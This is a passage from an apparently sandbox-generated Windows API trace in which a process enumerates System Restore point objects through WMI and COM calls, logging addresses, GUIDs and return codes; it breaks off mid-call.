Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6025450) returned 0x0 [0122.803] WbemDefPath:IUnknown:Release (This=0x60248b0) returned 0x0 [0122.803] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6025450) returned 0x0 [0122.803] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.804] WbemDefPath:IUnknown:AddRef (This=0x6025450) returned 0x3 [0122.804] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.804] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.804] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe15d8) returned 0x0 [0122.804] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe15d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.804] WbemDefPath:IUnknown:Release (This=0xbe15d8) returned 0x3 [0122.804] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.804] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.804] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.804] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x2 [0122.804] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x1 [0122.804] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.804] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.804] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025450, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6025450) returned 0x0 [0122.804] WbemDefPath:IUnknown:AddRef (This=0x6025450) returned 0x3 [0122.804] WbemDefPath:IUnknown:Release (This=0x6025450) returned 0x2 [0122.804] WbemDefPath:IWbemPath:SetText (This=0x6025450, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=13") returned 0x0 [0122.804] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.804] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.804] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.804] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.804] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.804] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.804] IWbemClassObject:Get (in: This=0x6026908, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a1b28*=0, plFlavor=0x38a1b2c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), pType=0x38a1b28*=19, plFlavor=0x38a1b2c*=0) returned 0x0 [0122.805] IWbemClassObject:Get (in: This=0x6026908, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a1b28*=19, plFlavor=0x38a1b2c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd, varVal2=0x0), pType=0x38a1b28*=19, plFlavor=0x38a1b2c*=0) returned 0x0 [0122.805] CoTaskMemAlloc (cb=0x4) returned 0xbe1618 [0122.805] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1618, puReturned=0x389bfe4 | out: apObjects=0xbe1618*=0x6026bf0, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.805] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6026bf0) returned 0x0 [0122.806] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.806] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.806] IUnknown:AddRef (This=0x6026bf0) returned 0x3 [0122.806] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.806] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.806] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6026bf4) returned 0x0 [0122.806] IMarshal:GetUnmarshalClass (in: This=0x6026bf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.806] IUnknown:Release (This=0x6026bf4) returned 0x3 [0122.806] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.806] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.806] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.806] IUnknown:Release (This=0x6026bf0) returned 0x2 [0122.806] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.806] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.806] IUnknown:QueryInterface (in: This=0x6026bf0, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6026bf0) returned 0x0 [0122.806] IUnknown:AddRef (This=0x6026bf0) returned 0x4 [0122.806] IUnknown:Release (This=0x6026bf0) returned 0x3 [0122.806] IUnknown:Release (This=0x6026bf0) returned 0x2 [0122.806] CoTaskMemFree (pv=0xbe1618) [0122.806] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.806] IUnknown:AddRef (This=0x6026bf0) returned 0x3 [0122.806] IWbemClassObject:Get (in: This=0x6026bf0, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.806] IWbemClassObject:Get (in: This=0x6026bf0, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.807] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14") returned 0x70 [0122.807] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14") returned 0x70 [0122.807] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.807] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.807] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.807] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.807] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x60248c0) returned 0x0 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60248c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.808] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60248c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x60254c0) returned 0x0 [0122.808] WbemDefPath:IUnknown:Release (This=0x60248c0) returned 0x0 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x60254c0) returned 0x0 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.808] WbemDefPath:IUnknown:AddRef (This=0x60254c0) returned 0x3 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbe1618) returned 0x0 [0122.808] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe1618, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.808] WbemDefPath:IUnknown:Release (This=0xbe1618) returned 0x3 [0122.808] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.808] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.808] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x2 [0122.808] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x1 [0122.808] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.808] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.808] WbemDefPath:IUnknown:QueryInterface (in: This=0x60254c0, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x60254c0) returned 0x0 [0122.808] WbemDefPath:IUnknown:AddRef (This=0x60254c0) returned 0x3 [0122.809] WbemDefPath:IUnknown:Release (This=0x60254c0) returned 0x2 [0122.809] WbemDefPath:IWbemPath:SetText (This=0x60254c0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=14") returned 0x0 [0122.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.809] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.809] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.809] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.809] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.809] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.809] IWbemClassObject:Get (in: This=0x6026bf0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a2378*=0, plFlavor=0x38a237c*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), pType=0x38a2378*=19, plFlavor=0x38a237c*=0) returned 0x0 [0122.809] IWbemClassObject:Get (in: This=0x6026bf0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38a2378*=19, plFlavor=0x38a237c*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xe, varVal2=0x0), pType=0x38a2378*=19, plFlavor=0x38a237c*=0) returned 0x0 [0122.809] CoTaskMemAlloc (cb=0x4) returned 0xbe1658 [0122.809] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbe1658, puReturned=0x389bfe4 | out: apObjects=0xbe1658*=0x6026ea8, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.810] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6026ea8) returned 0x0 [0122.810] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.810] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.810] IUnknown:AddRef (This=0x6026ea8) returned 0x3 [0122.810] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.810] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.810] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6026eac) returned 0x0 [0122.810] IMarshal:GetUnmarshalClass (in: This=0x6026eac, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.810] IUnknown:Release (This=0x6026eac) returned 0x3 [0122.810] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.810] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.811] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.811] IUnknown:Release (This=0x6026ea8) returned 0x2 [0122.811] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.811] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.811] IUnknown:QueryInterface (in: This=0x6026ea8, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6026ea8) returned 0x0 [0122.811] IUnknown:AddRef (This=0x6026ea8) returned 0x4 [0122.811] IUnknown:Release (This=0x6026ea8) returned 0x3 [0122.811] IUnknown:Release (This=0x6026ea8) returned 0x2 [0122.811] CoTaskMemFree (pv=0xbe1658) [0122.811] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.811] IUnknown:AddRef (This=0x6026ea8) returned 0x3 [0122.811] IWbemClassObject:Get (in: This=0x6026ea8, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.811] IWbemClassObject:Get (in: This=0x6026ea8, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.811] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15") returned 0x70 [0122.811] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=15") returned 0x70 [0122.811] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.811] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.811] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.812] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.812] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, 